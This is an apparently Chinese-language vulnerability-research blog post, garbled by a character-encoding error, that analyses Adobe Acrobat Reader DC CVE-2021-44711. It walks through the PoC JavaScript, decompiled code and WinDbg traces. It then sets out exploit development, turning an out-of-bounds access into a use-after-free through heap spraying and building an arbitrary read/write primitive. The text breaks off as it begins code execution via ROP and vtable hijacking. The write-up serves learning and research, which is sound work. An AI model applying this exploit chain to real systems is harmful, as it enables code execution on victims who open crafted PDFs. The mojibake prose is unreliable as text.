I"‹_<h1 id="å‰è¨€">å‰è¨€</h1>

<p>æœ€è¿‘çœ‹åˆ°ä¸€ç¯‡<a href="https://vul.360.net/archives/434">Adobe Reader æ¼æ´ CVE-2021-44711 åˆ©ç”¨æµ…æ</a>æ¼æ´åˆ†ææ–‡ç« ï¼Œæ‰“ç®—ä»è¯¥æ¼æ´å¼€å§‹å­¦ä¹ PDFç±»å‹æ¼æ´çš„åˆ†æä¸åˆ©ç”¨ï¼Œæ ¹æ®æ–‡ç« çš„åˆ†ææ€è·¯å†™å‡ºEXPã€‚<!--more-->åˆ†æä½¿ç”¨çš„è½¯ä»¶ç‰ˆæœ¬ä¸ºï¼š<code class="language-plaintext highlighter-rouge">Adobe Acrobat Reader DC 2021.007.20099(x86)</code>ã€‚</p>

<h1 id="æ¼æ´åˆ†æ">æ¼æ´åˆ†æ</h1>

<p>æ¼æ´é€šè¿‡PDFå†…åµŒçš„jsä»£ç è§¦å‘ï¼ŒPOCä»£ç å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var _obj = {};
_obj[-1] = null;
var _annot = this.addAnnot({page:0, type:"Line", points:_obj});
</code></pre></div></div>

<p>POCéå¸¸ç®€å•ï¼Œå…³é”®å°±åœ¨äºAnnotation å¯¹è±¡çš„ pointså±æ€§åŸæœ¬åº”è¯¥ç”±ä¸¤ä¸ªç‚¹<code class="language-plaintext highlighter-rouge">{[x1,y1],[x2,y2]}</code>ç»„æˆçš„ï¼Œä»£è¡¨Annotationå¯¹è±¡ç›´çº¿çš„èµ·ç‚¹å’Œç»ˆç‚¹ã€‚ç„¶è€Œpocçš„ä»£ç å°†-1ä½œä¸ºä¸‹æ ‡ï¼Œåœ¨è¿›è¡Œç±»å‹è½¬æ¢æ—¶å¯¼è‡´äº†è¶Šç•Œè®¿é—®é€ æˆæ¼æ´ã€‚</p>

<p>ç±»å‹è½¬æ¢å‡½æ•°å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>//å‡½æ•°åç§»ï¼šAnnots.api+0x32EC6
if ( (int *)v11 != result )
    {
      do
      {
        index_str = (char *)(*(int (__thiscall **)(_DWORD, _DWORD))(dword_22747430 + 0x1C))(
                              *(_DWORD *)(dword_22747430 + 0x1C),
                              *(unsigned __int16 *)(v11 + 0x10));
        index_num = atoi_0(this_1, index_str);  // è½¬æ¢å­—ç¬¦ä¸‹æ ‡ä¸ºæ•°å­—ä¸‹æ ‡ï¼Œå°†-1è½¬åŒ–ä¸º0xffffffff
        v26 = 0x30;
        arraysize = v25[1] - *v25;
        HIDWORD(v21) = *v25;
        v22 = index_num;
        if ( arraysize / 0x30 &lt;= index_num )    // å¦‚æœæ•°ç»„å¯¹è±¡çš„æ•°é‡å°äºå½“å‰ä¸‹æ ‡çš„å€¼ï¼Œåˆ™é‡æ–°åˆ†é…æ•°ç»„å¤§å°ï¼Œæ­¤æ—¶index_numä¸º0xfffffff &gt; 0
          resize(index_num + 1, var_11);   		// æ ¹æ®ä¸‹æ ‡é‡æ–°åˆ†é…æ•°ç»„å¤§å°
        sub_2212379A(v11 + 0x18);               // ç±»å‹è½¬æ¢
        result = (int *)sub_2212A202(&amp;v23);
        v11 = (int)v23;
      }
      while ( v23 != *v4 );
</code></pre></div></div>

<p>å‡½æ•°é¦–å…ˆå°†å­—ç¬¦ä¸‹æ ‡index_strè½¬æ¢ä¸ºæ•°å­—ä¸‹æ ‡index_numï¼Œéšååˆ¤æ–­å½“å‰ä¸‹æ ‡æ˜¯å¦å¤§äºç›®å‰æ•°ç»„å¯¹è±¡çš„æ•°é‡ï¼ˆ0x30ä¸ºå•ä¸ªæ•°ç»„å¯¹è±¡çš„å¤§å°ï¼‰ï¼Œå¦‚æœå¤§äºåˆ™éœ€è¦é‡æ–°åˆ†é…æ•°ç»„çš„å¤§å°ã€‚resizeå‡½æ•°æ¥æ”¶ä¸‹æ ‡+1ä»£è¡¨å®é™…è¦è®¿é—®çš„å¯¹è±¡æ•°é‡ï¼Œresizeå‡½æ•°å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>unsigned int __thiscall resize(_DWORD *this, unsigned int index, int arg_4)
{
  unsigned int Array_Num; // eax
  int target; // esi

  Array_Num = (this[1] - *this) / 0x30;			//ç”±äºArrayä¸ºç©ºï¼Œå› æ­¤Array_Num=0
  if ( index &gt;= Array_Num )						//æ­¤æ—¶indexä¸º0ï¼Œè€ŒArray_Num=0ï¼Œå› æ­¤ç›´æ¥è¿”å›å½“å‰æ•°ç»„å¤§å°ä¸º0
  {
    if ( index &gt; Array_Num )                    // å¦‚æœå½“å‰ä¸‹æ ‡+1å¤§äºæ•°ç»„å¯¹è±¡çš„æ•°é‡ï¼Œåˆ™éœ€è¦é‡æ–°åˆ†é…æ•°ç»„å¤§å°
    {
      if ( index &lt;= (this[2] - *this) / 0x30 )
      {
        Array_Num = sub_2216FDF1(this[1], index - Array_Num);// æ‰©å……arrayçš„å¤§å°ç¬¦åˆindex+1
        this[1] = Array_Num;
      }
      else
      {
        Array_Num = sub_2216FD0D(this, index, arg_4);// æ£€æŸ¥indexå¤§äº0x5555555æ—¶åˆ™æŠ›å‡ºå¼‚å¸¸
      }
    }
  }
  else
  {
    target = *this + 0x30 * index;
    Array_Num = sub_2213A435(target, this[1]);
    this[1] = target;
  }
  return Array_Num;
}
</code></pre></div></div>

<p>å½“indexä¸º-1æ—¶ï¼Œç”±äºæ•°ç»„æœ¬èº«ä¸ºç©ºï¼Œå› æ­¤resizeå‡½æ•°ä¸­ä¼ å…¥çš„indexä¸º0ï¼Œè€ŒArray_Numä¹Ÿä¸º0ï¼Œå› æ­¤ç›´æ¥è¿”å›äº†0ä½œä¸ºå®é™…çš„æ•°ç»„å¤§å°ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>//æ‰§è¡Œå®Œresizeä¹‹åï¼Œæ­¤æ—¶ecxä¸ºthisï¼Œå³arrayçš„æŒ‡é’ˆï¼Œeaxä¸ºè¿”å›çš„resizeåæ•°ç»„å¯¹è±¡çš„ä¸ªæ•°
0:000&gt; dd ecx L4																	//arrayä¸­ä¸ºç©º
08d615b8  00000000 00000000 00000000 00000000
0:000&gt; p
eax=00000000 ebx=07074508 ecx=00000000 edx=00000000 esi=08d7b840 edi=08d615b8
eip=6e873049 esp=0034bfc0 ebp=0034c008 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
Annots!PlugInMain+0x15219:
6e873049 8b07            mov     eax,dword ptr [edi]  ds:002b:08d615b8=00000000		//è·å–arrayçš„èµ·å§‹åœ°å€
0:000&gt; p
eax=00000000 ebx=07074508 ecx=00000000 edx=00000000 esi=08d7b840 edi=08d615b8
eip=6e87304b esp=0034bfc0 ebp=0034c008 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
Annots!PlugInMain+0x1521b:
6e87304b 8b4dd4          mov     ecx,dword ptr [ebp-2Ch] ss:002b:0034bfdc=ffffffff	//è·å–index
0:000&gt; 
eax=00000000 ebx=07074508 ecx=ffffffff edx=00000000 esi=08d7b840 edi=08d615b8
eip=6e87304e esp=0034bfc0 ebp=0034c008 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
Annots!PlugInMain+0x1521e:
6e87304e eb03            jmp     Annots!PlugInMain+0x15223 (6e873053)
0:000&gt; p
eax=00000000 ebx=07074508 ecx=ffffffff edx=00000000 esi=08d7b840 edi=08d615b8
eip=6e873053 esp=0034bfc0 ebp=0034c008 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
Annots!PlugInMain+0x15223:
6e873053 6bc930          imul    ecx,ecx,30h									//è®¡ç®—å½“å‰ä¸‹æ ‡å¯¹è±¡è·ç¦»arrayèµ·å§‹åœ°å€çš„å¤§å°ï¼Œindex*0x30
0:000&gt; 
eax=00000000 ebx=07074508 ecx=ffffffd0 edx=00000000 esi=08d7b840 edi=08d615b8	//ç„¶è€Œå½“å‰indexä¹˜0x30åå¾—åˆ°0xffffffd0ï¼Œæ˜¯ä¸ªé”™è¯¯çš„å¤§å°
eip=6e873056 esp=0034bfc0 ebp=0034c008 iopl=0         nv up ei ng nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200282
Annots!PlugInMain+0x15226:
6e873056 83c618          add     esi,18h
0:000&gt; 
eax=00000000 ebx=07074508 ecx=ffffffd0 edx=00000000 esi=08d7b858 edi=08d615b8
eip=6e873059 esp=0034bfc0 ebp=0034c008 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
Annots!PlugInMain+0x15229:
6e873059 56              push    esi
0:000&gt; 
eax=00000000 ebx=07074508 ecx=ffffffd0 edx=00000000 esi=08d7b858 edi=08d615b8
eip=6e87305a esp=0034bfbc ebp=0034c008 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
Annots!PlugInMain+0x1522a:
6e87305a 03c8            add     ecx,eax											//å°†arrayçš„èµ·å§‹åœ°å€åŠ ä¸Šå½“å‰ä¸‹æ ‡å¯¹è±¡è·ç¦»ï¼Œå¾—åˆ°å½“å‰ä¸‹æ ‡																						å¯¹è±¡çš„åœ°å€ï¼Œç”±äºå–åˆ°é”™è¯¯çš„å¤§å°å¯¼è‡´æ‹¿åˆ°äº†é”™è¯¯çš„å€¼
0:000&gt; 
eax=00000000 ebx=07074508 ecx=ffffffd0 edx=00000000 esi=08d7b858 edi=08d615b8
eip=6e87305c esp=0034bfbc ebp=0034c008 iopl=0         nv up ei ng nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200282
Annots!PlugInMain+0x1522c:
6e87305c e83907ffff      call    Annots!PlugInMain+0x596a (6e86379a)			//è°ƒç”¨è¯¥å‡½æ•°è¿›è¡Œç±»å‹è½¬æ¢ï¼Œä¼ å…¥äº†é”™è¯¯äº†å¯¹è±¡åœ°å€
0:000&gt; 
(f00.92c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=70f6f258 ebx=ffffffd0 ecx=ffffffd0 edx=00000000 esi=00000000 edi=ffffffd0
eip=6e863a2d esp=0034bf5c ebp=0034bf84 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210202
Annots!PlugInMain+0x5bfd:
6e863a2d 833f01          cmp     dword ptr [edi],1    ds:002b:ffffffd0=????????	//å‡½æ•°å†…éƒ¨åœ¨è·å–å½“å‰ä¸‹æ ‡å¯¹è±¡æ—¶å‡ºç°äº†è®¿é—®å¼‚å¸¸
</code></pre></div></div>

<p>æœ€ç»ˆåœ¨æ‰§è¡Œç±»å‹è½¬æ¢å‡½æ•°æ—¶è·å–å½“å‰ä¸‹æ ‡å¯¹è±¡çš„åœ°å€ï¼š*this + index * 0x30æ—¶ï¼Œè·å–åˆ°äº†é”™è¯¯çš„å€¼0xffffffd0é€ æˆäº†è®¿é—®å¼‚å¸¸ã€‚</p>

<h1 id="æ¼æ´åˆ©ç”¨">æ¼æ´åˆ©ç”¨</h1>

<p>å¯¼è‡´å´©æºƒçš„åŸå› æ˜¯å› ä¸ºAnnotation å¯¹è±¡çš„ pointså±æ€§ä¸ºç©ºï¼Œå¯¼è‡´è·å–ç›®æ ‡indexå¯¹è±¡æ—¶ç›´æ¥è®¿é—®äº†index * 0x30çš„åœ°å€ã€‚å› æ­¤ä¿®æ”¹POCå¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var _annot = this.addAnnot({page:0, type:"Line"});
var _obj = {};
_obj[2] = 2;
_annot.points = _obj;
_obj[-1] = null;
_annot.points = _obj;
</code></pre></div></div>

<p>ä¸‹æ–­äºresizeå‡½æ•°ï¼Œå¯ä»¥çœ‹åˆ°æ­¤æ—¶Arrayä¸å†ä¸ºç©ºï¼Œå¤§å°ä¸º0x90ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:000&gt; pc
eax=00000000 ebx=070616a8 ecx=070d6288 edx=00000000 esi=0706cf38 edi=070d6288
eip=70803044 esp=002fbbe8 ebp=002fbc38 iopl=0         nv up ei pl nz ac po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000213
Annots!PlugInMain+0x15214:
70803044 e83ecc0300      call    Annots!PlugInMain+0x51e57 (7083fc87)		//resizeå‡½æ•°
0:000&gt; dd ecx l4								//Array _obj
070d6288  0700d8a0 0700d930 0700d930 00000000
0:000&gt; ? 0700d930 - 0700d8a0 					//Array Size = 0x90
Evaluate expression: 144 = 00000090
</code></pre></div></div>

<p>éšåç»§ç»­æ‰§è¡Œåˆ°ç±»å‹è½¬æ¢å‡½æ•°ï¼Œåœ¨è·å–å½“å‰ä¸‹æ ‡å¯¹è±¡çš„åœ°å€æ—¶ï¼Œç”±äºarrayä¸ä¸ºç©ºèƒ½å¤Ÿç›´æ¥è·å–åˆ°arrayçš„èµ·å§‹åœ°å€ï¼Œæœ€ç»ˆè·å–çš„ç»“æœæ­£å¥½ä¸º_obj[-1]ï¼Œé€ æˆäº†å†…å­˜è¶Šç•Œè®¿é—®ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:000&gt; P
eax=002fbb78 ebx=070616a8 ecx=ea9f14a7 edx=0000000b esi=0706cf38 edi=070d6288
eip=70803049 esp=002fbbf0 ebp=002fbc38 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000216
Annots!PlugInMain+0x15219:
70803049 8b07            mov     eax,dword ptr [edi]  ds:002b:070d6288=0700d8a0			//è·å–arrayçš„èµ·å§‹åœ°å€ï¼Œæ­¤æ—¶ä¸ä¸º0
0:000&gt; p
eax=0700d8a0 ebx=070616a8 ecx=ea9f14a7 edx=0000000b esi=0706cf38 edi=070d6288
eip=7080304b esp=002fbbf0 ebp=002fbc38 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000216
Annots!PlugInMain+0x1521b:
7080304b 8b4dd4          mov     ecx,dword ptr [ebp-2Ch] ss:002b:002fbc0c=ffffffff		//è·å–index
0:000&gt; p
eax=0700d8a0 ebx=070616a8 ecx=ffffffff edx=0000000b esi=0706cf38 edi=070d6288
eip=7080304e esp=002fbbf0 ebp=002fbc38 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000216
Annots!PlugInMain+0x1521e:
7080304e eb03            jmp     Annots!PlugInMain+0x15223 (70803053)
0:000&gt; p
eax=0700d8a0 ebx=070616a8 ecx=ffffffff edx=0000000b esi=0706cf38 edi=070d6288
eip=70803053 esp=002fbbf0 ebp=002fbc38 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000216
Annots!PlugInMain+0x15223:
70803053 6bc930          imul    ecx,ecx,30h						//è®¡ç®—å½“å‰ä¸‹æ ‡å¯¹è±¡è·ç¦»arrayèµ·å§‹åœ°å€çš„å¤§å°ï¼Œindex*0x30
0:000&gt; p
eax=0700d8a0 ebx=070616a8 ecx=ffffffd0 edx=0000000b esi=0706cf38 edi=070d6288
eip=70803056 esp=002fbbf0 ebp=002fbc38 iopl=0         nv up ei ng nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000282
Annots!PlugInMain+0x15226:
70803056 83c618          add     esi,18h
0:000&gt; p
eax=0700d8a0 ebx=070616a8 ecx=ffffffd0 edx=0000000b esi=0706cf50 edi=070d6288
eip=70803059 esp=002fbbf0 ebp=002fbc38 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000216
Annots!PlugInMain+0x15229:
70803059 56              push    esi
0:000&gt; p
eax=0700d8a0 ebx=070616a8 ecx=ffffffd0 edx=0000000b esi=0706cf50 edi=070d6288
eip=7080305a esp=002fbbec ebp=002fbc38 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000216
Annots!PlugInMain+0x1522a:
7080305a 03c8            add     ecx,eax							//è·å–å½“å‰ä¸‹æ ‡å¯¹è±¡çš„åœ°å€ä¸º_obj[-1]ï¼Œå³*this - 0x30
0:000&gt; 
eax=0700d8a0 ebx=070616a8 ecx=0700d870 edx=0000000b esi=0706cf50 edi=070d6288
eip=7080305c esp=002fbbec ebp=002fbc38 iopl=0         nv up ei pl nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000203
Annots!PlugInMain+0x1522c:
7080305c e83907ffff      call    Annots!PlugInMain+0x596a (707f379a)	//ç±»å‹è½¬æ¢å‡½æ•°
0:000&gt; dd ecx L30
//_obj[-1]ï¼Œè¯¥å—å†…å­˜ä¸ºè¶Šç•Œè¯»è®¿é—®çš„å†…å®¹
0700d870  00000000 00000000 00000000 00000000
0700d880  00010000 00000000 00010000 7217beb0
0700d890  0704eea8 80000000 0b758404 88007010
//_obj[0]
0700d8a0  00000000 0055005c 00000000 00000000
0700d8b0  0041005c 006d0064 006e0069 00730069
0700d8c0  00720074 00740061 00000000 0041005c
//_obj[1]
0700d8d0  00000000 00610044 00000000 00000000
0700d8e0  0061006f 0069006d 0067006e 0041005c
0700d8f0  006f0064 00650062 00000000 00720063
//_obj[2]
0700d900  00000000 00740061 00000000 40000000
0700d910  004d0054 006f0044 00730063 0073002e
0700d920  00760061 00760000 00000000 00000000
</code></pre></div></div>

<h2 id="å†…å­˜è¶Šç•Œè®¿é—®è½¬åŒ–ä¸ºuaf">å†…å­˜è¶Šç•Œè®¿é—®è½¬åŒ–ä¸ºUAF</h2>

<p>åªæ˜¯å†…å­˜è¶Šç•Œè®¿é—®æ— æ³•åˆ©ç”¨ï¼Œç„¶è€Œåœ¨ç±»å‹è½¬æ¢å‡½æ•°<code class="language-plaintext highlighter-rouge">sub_2212379A</code>ä¸­ä¼šæ ¹æ®*thisçš„ä¸åŒè°ƒç”¨ä¸åŒçš„è½¬æ¢å‡½æ•°ï¼š</p>

<p><img src="https://blog-1257303866.cos.ap-guangzhou.myqcloud.com/img/image-20220908120809935.png" alt="image-20220908120809935" /></p>

<p>åˆ†æè¿™äº›è½¬æ¢å‡½æ•°åå‘ç°*this=0x1aæ—¶æ‰§è¡Œçš„å‡½æ•°å†…è°ƒç”¨freeå‡½æ•°é‡Šæ”¾äº†ä½äº*(this+8)çš„å†…å­˜ï¼š</p>

<p><img src="https://blog-1257303866.cos.ap-guangzhou.myqcloud.com/img/image-20220908143515273.png" alt="image-20220908143515273" /></p>

<p>æ¥ä¸‹æ¥çš„åˆ©ç”¨æ€è·¯å°±æ˜¯å°†å†…å­˜è¶Šç•Œè®¿é—®è½¬åŒ–ä¸ºUAFï¼Œå…·ä½“çš„æ­¥éª¤å¦‚ä¸‹ï¼š</p>

<ol>
  <li>é€šè¿‡å †å–·å¤§å°ä¸º0x1ffdçš„Arrayå¯¹è±¡å ä½ç¨³å®šçš„å†…å­˜åœ°å€0x20000048ï¼Œä½¿å¾—åç»­æ¼æ´è§¦å‘é‡Šæ”¾è¯¥å—å†…å­˜</li>
  <li>å†æ¬¡å †å–·å¤§å°ä¸º0x10å¤§å°çš„Arrayå¯¹è±¡å¸ƒå±€å†…å­˜ï¼Œä½¿å¾—æ¼æ´è§¦å‘æ—¶*this=0x1aï¼Œ*(this+8) = 0x20000048ï¼Œæ¼æ´è§¦å‘åå†…å­˜åœ°å€è¢«é‡Šæ”¾</li>
</ol>

<p>ä¸»è¦çš„éš¾ç‚¹åœ¨äºå¦‚ä½•æ„é€ 0x10å¤§å°çš„Arrayå¯¹è±¡å¸ƒå±€å†…å­˜ï¼Œä¸Šé¢çš„åˆ†æå¯ä»¥å¾—å‡ºobjå¯¹è±¡å ç”¨çš„å†…å­˜å¤§å°ä¸º0x90ã€‚å› æ­¤åªéœ€è¦å †å–·0x90å¤§å°çš„å¯¹è±¡ï¼Œå¹¶åˆ¶é€ å†…å­˜ç©ºæ´ï¼Œå°±å¯ä»¥è®©_objå¯¹è±¡ç²¾ç¡®çš„ä½äºä¸¤ä¸ªç²¾å¿ƒæ„é€ çš„å†…å­˜ä¹‹é—´ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x00  -&gt;  +---------------------+
          | 	   Array	    |
0x90  -&gt;  +---------------------+
          |        free         |  &lt;------ _obj
0x120 -&gt;  +---------------------+
          |        Array        |
0x1b0 -&gt;  +---------------------+
          |        free         |
0x240 -&gt;  +---------------------+
          |        Array        |
0x2d0 -&gt;  +---------------------+
</code></pre></div></div>

<p>å› æ­¤éœ€è¦å †å–·çš„0x10å¤§å°çš„Arrayå¯¹è±¡å†…å­˜å¸ƒå±€å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>js:
fakelement = new Array(0x10);
fakelement[11] = 0x1a;
fakelement[12] = 0x20000048;

0:000&gt; dd 07e21608 L26
//fakelement_01
07e21608  00000000 0000000d 00000010 00000010
07e21618  00000000 ffffff84 00000000 ffffff84
07e21628  00000000 ffffff84 00000000 ffffff84
07e21638  00000000 ffffff84 00000000 ffffff84
07e21648  00000000 ffffff84 00000000 ffffff84
07e21658  00000000 ffffff84 00000000 ffffff84
07e21668  00000000 ffffff84 0000001a ffffff81
07e21678  20000048 ffffff81 00000000 00000000
07e21688  00000000 00000000 00000000 00000000
07e21698  62334f4b 88000000
//fakelement_02
0:000&gt; dd 07e216a0  L26
07e216a0  00000000 0000000d 00000010 00000010
07e216b0  00000000 ffffff84 00000000 ffffff84
07e216c0  00000000 ffffff84 00000000 ffffff84
07e216d0  00000000 ffffff84 00000000 ffffff84
07e216e0  00000000 ffffff84 00000000 ffffff84
07e216f0  00000000 ffffff84 00000000 ffffff84
07e21700  00000000 ffffff84 0000001a ffffff81
07e21710  20000048 ffffff81 00000000 00000000
07e21720  00000000 00000000 00000000 00000000
07e21730  62334f7e 88000000
</code></pre></div></div>

<p>ä»ç›¸é‚»çš„Arrayå¯¹è±¡å†…å­˜å¸ƒå±€å¯ä»¥çœ‹å‡ºæ¯ä¸ªArrayå¯¹è±¡ä»¥8ä¸ªå­—èŠ‚çš„æ•°æ®éš”å¼€ï¼Œå› æ­¤å½“_objå ä½äºè¢«é‡Šæ”¾çš„Arrayå¯¹è±¡æ—¶ï¼Œ_obj[-1]æ­£å¥½è®¿é—®çš„æ˜¯ä¸Šä¸€ä¸ªArrayå¯¹è±¡çš„0x1aï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:000&gt; dd 06e19250 - 0x30 L30
//_obj[-1]
06e19220  0000001a ffffff81 20000048 ffffff81
06e19230  00000000 00000000 00000000 00000000
06e19240  00000000 00000000 2922eb66 88000000
//_obj[0]
06e19250  00000000 0000000d 00000000 00000000
06e19260  00000000 ffffff84 00000000 ffffff84
06e19270  00000000 ffffff84 00000000 ffffff84
06e19280  00000000 ffffff84 00000000 00000000
06e19290  00000000 ffffff84 00000000 ffffff84
06e192a0  00000000 ffffff84 00000000 ffffff84
06e192b0  00000000 ffffff84 00000000 40000000
06e192c0  20000048 ffffff81 00000000 00000000
06e192d0  00000000 00000000 00000000 00000000
</code></pre></div></div>

<p>æ¥ç€æ‰§è¡Œç±»å‹è½¬æ¢çš„å‡½æ•°å¯ä»¥çœ‹åˆ°å½“å‰thisæŒ‡é’ˆæ­£å¥½æŒ‡å‘_obj[-1]ï¼Œä¸‹æ–­åœ¨freeå‡½æ•°ï¼Œä¼ å…¥çš„å‚æ•°æ­£æ˜¯0x20000048ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:000&gt; g
Breakpoint 1 hit
eax=0015c0d4 ebx=06e19220 ecx=06e19220 edx=06e19220 esi=00000000 edi=06e19220
eip=705e89d1 esp=0015c0c4 ebp=0015c0f4 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
Annots!PlugInMain+0xaba1:
705e89d1 55              push    ebp
0:000&gt; dd ecx Lc
06e19220  0000001a ffffff81 20000048 ffffff81
06e19230  00000000 00000000 00000000 00000000
06e19240  00000000 00000000 2922eb66 88000000
0:000&gt; g
eax=20000048 ebx=06e19220 ecx=06e19220 edx=0000001a esi=00000000 edi=0015c0d4
eip=7436f7e0 esp=0015bf8c ebp=0015bf94 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
ucrtbase!free:
7436f7e0 8bff            mov     edi,edi
0:000&gt; dps esp L2
0015bf8c  705dd041 Annots+0x1d041
0015bf90  20000048		//freeçš„å†…å­˜åœ°å€
</code></pre></div></div>

<p>åˆ°è¿™ä¸€æ­¥ï¼Œæ¼æ´å·²ç»ä»è¶Šç•Œå†…å­˜è®¿é—®è½¬å˜ä¸ºäº†UAFï¼Œå‰©ä¸‹çš„å°±æ˜¯åˆ©ç”¨é‡Šæ”¾çš„å†…å­˜æ„é€ è¯»å†™åŸè¯­äº†ã€‚</p>

<h2 id="ä»»æ„å†…å­˜è¯»å†™åŸè¯­çš„æ„é€ ">ä»»æ„å†…å­˜è¯»å†™åŸè¯­çš„æ„é€ </h2>

<p>ç›®å‰å·²ç»æœ‰ä¸€ä¸ªè¢«é‡Šæ”¾çš„0x1ffeå¤§å°çš„Arrayå¯¹è±¡ï¼Œå› æ­¤ç”¨0xffe8å¤§å°çš„ArrayBufferå¯¹è±¡å ä½åŒä¸€å—å†…å­˜ã€‚ç”±äºArrayå¯¹è±¡å’ŒArrayBufferå¯¹è±¡è¡¨ç¤ºé•¿åº¦å±æ€§çš„å†…å­˜åœ¨åŒä¸€ä½ç½®ï¼Œè¿™æ ·å°±å¯¼è‡´äº†Arrayå¯¹è±¡çš„é•¿åº¦è¢«æ‰©å±•ä¸º0xffe8ï¼Œå› æ­¤èƒ½å¤Ÿè¶Šç•Œè¯»å†™ä¸‹ä¸€ä¸ªä¸´è¿‘Arrayå¯¹è±¡çš„lengthå€¼äº†ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:000&gt; dd 20000048 L10		//Arrayå¯¹è±¡åˆå§‹é•¿åº¦ä¸º0x1ffd
20000048  00000000 00001ffd 00001ffd 00001ffd
20000058  00000000 ffffff81 00000000 ffffff81
20000068  00000000 ffffff81 00000000 ffffff81
20000078  00000000 ffffff81 00000000 ffffff81
0:000&gt; dd 20000048 L10		//å†…å­˜å ç”¨åé•¿åº¦ä¸º0xffe8
20000048  00000000 0000ffe8 07631450 00000000
20000058  41414141 ffffff81 00000000 00000000
20000068  00000000 00000000 00000000 00000000
20000078  00000000 00000000 00000000 00000000
</code></pre></div></div>

<p>ä½†æ˜¯Arrayå¯¹è±¡è¯»å†™å†…å­˜çš„èƒ½åŠ›ä¸å¦‚ArrayBufferï¼Œäºæ˜¯é‡Šæ”¾æ‰ä¸‹ä¸€ä¸ªä¸´è¿‘çš„Arrayå¯¹è±¡ï¼Œå¹¶ç”¨ArrayBufferå¯¹è±¡å ç”¨å†…å­˜ï¼Œéšååˆ©ç”¨è¶Šç•Œè¯»å†™çš„Arrayå¯¹è±¡ä¿®æ”¹ArrayBufferå¯¹è±¡çš„é•¿åº¦ä¸º0xffffff81ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:018&gt; dd 20000048+0x10000 L10
20010048  00000000 ffffff81 091910e0 00000000
20010058  41414141 ffffff81 00000000 00000000
20010068  00000000 00000000 00000000 00000000
20010078  00000000 00000000 00000000 00000000
</code></pre></div></div>

<p>è‡³æ­¤å°±è·å¾—äº†é•¿åº¦ä¸º0xffffff81çš„ä»»æ„åœ°å€è¯»å†™åŸè¯­ï¼Œä¸è¿‡è¯¥ArrayBufferçš„èµ·å§‹åœ°å€ä¸º0x20010058ï¼Œå¦‚æœéœ€è¦è¯»å†™èµ·å§‹åœ°å€ä¹‹å‰çš„æ•°æ®ï¼Œåˆ™å¿…é¡»å°†ç›®çš„åœ°å€ + 0xffffffff + 1ï¼Œå¾—åˆ°çš„å€¼å†é€šè¿‡è¯»å†™åŸè¯­è¿›è¡Œè¯»å†™å°±å¯ä»¥æˆåŠŸå†™å…¥äº†ã€‚</p>

<h2 id="ä»£ç æ‰§è¡Œ">ä»£ç æ‰§è¡Œ</h2>

<p>æœ‰äº†ä»»æ„å†…å­˜è¯»å†™åŸè¯­åï¼Œæ¥ä¸‹æ¥å°±å¯ä»¥è·å–å‡½æ•°åœ°å€æ„é€ ROPé“¾äº†ã€‚æ„é€ å¥½åéœ€è¦åŠ«æŒå¯¹è±¡çš„è™šè¡¨å®ç°ï¼Œæ­¥éª¤å¦‚ä¸‹ï¼š</p>

<ol>
  <li>è·å–ä»»æ„å†…å­˜è¯»å†™åŸè¯­çš„è™šè¡¨åœ°å€</li>
